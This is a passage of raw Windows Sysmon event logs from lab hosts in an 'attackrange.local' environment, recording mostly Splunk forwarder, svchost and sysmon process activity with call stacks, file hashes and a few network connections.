YSTEM32\ntdll.dll+51781 10341000x8000000000000000805924Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.463{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F29D-60EB-3679-00000000D001}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805923Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.463{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F29D-60EB-3679-00000000D001}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805922Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.464{0C1E0330-F29D-60EB-3679-00000000D001}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000805921Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.237{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57145-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000805920Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.229{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=853A9E479F94D2F15BCD545D107F415E,SHA256=807CD0B0669848ACB461DF0D61CF2EA5BD641700D31EC409056C8BA8DDB4F8E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805919Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.229{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7D10A039549DB5572CD996CEE013BB6A,SHA256=F0AFD45C5CA697C374081226297853BBBB81A51E14F8D00EBBB78A517AC9C972,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805918Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.166{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08FD39E386651AFF99A05F50F2E06524,SHA256=99E951460C54D10C7E4D3F35CA4B3098BF876A6DA149E12FD8A15A00FF1B190A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045750Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:17.751{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50892-false10.0.1.12-8000- 23542300x80000000000000001045753Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:26.974{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBEBD21522E0F64414B46DCB72A330F2,SHA256=FCA390D9721FAF4EA886494A39BB1F20720D84A45FEDE169F3B0ADE65357EAB5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000805964Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.947{0C1E0330-F29E-60EB-3879-00000000D001}24003928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805963Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.822{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F29E-60EB-3879-00000000D001}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805962Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.822{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805961Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.822{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805960Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.822{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805959Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.822{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805958Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.822{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805957Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.822{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805956Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.822{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805955Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.807{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805954Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.807{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805953Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.807{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F29E-60EB-3879-00000000D001}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805952Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.807{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F29E-60EB-3879-00000000D001}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805951Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.808{0C1E0330-F29E-60EB-3879-00000000D001}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000805950Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.698{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=853A9E479F94D2F15BCD545D107F415E,SHA256=807CD0B0669848ACB461DF0D61CF2EA5BD641700D31EC409056C8BA8DDB4F8E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805949Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.448{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63EE9F5BB659AEB05FD790CA92B847BE,SHA256=8CA827F26995D4666E830934781F5575369F10D3EFAE05E29425D1189220C651,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045752Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:18.694{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-53243-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 10341000x8000000000000000805948Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.166{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F29E-60EB-3779-00000000D001}1520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805947Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.166{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805946Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.166{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805945Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.166{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805944Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.166{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805943Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.166{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SY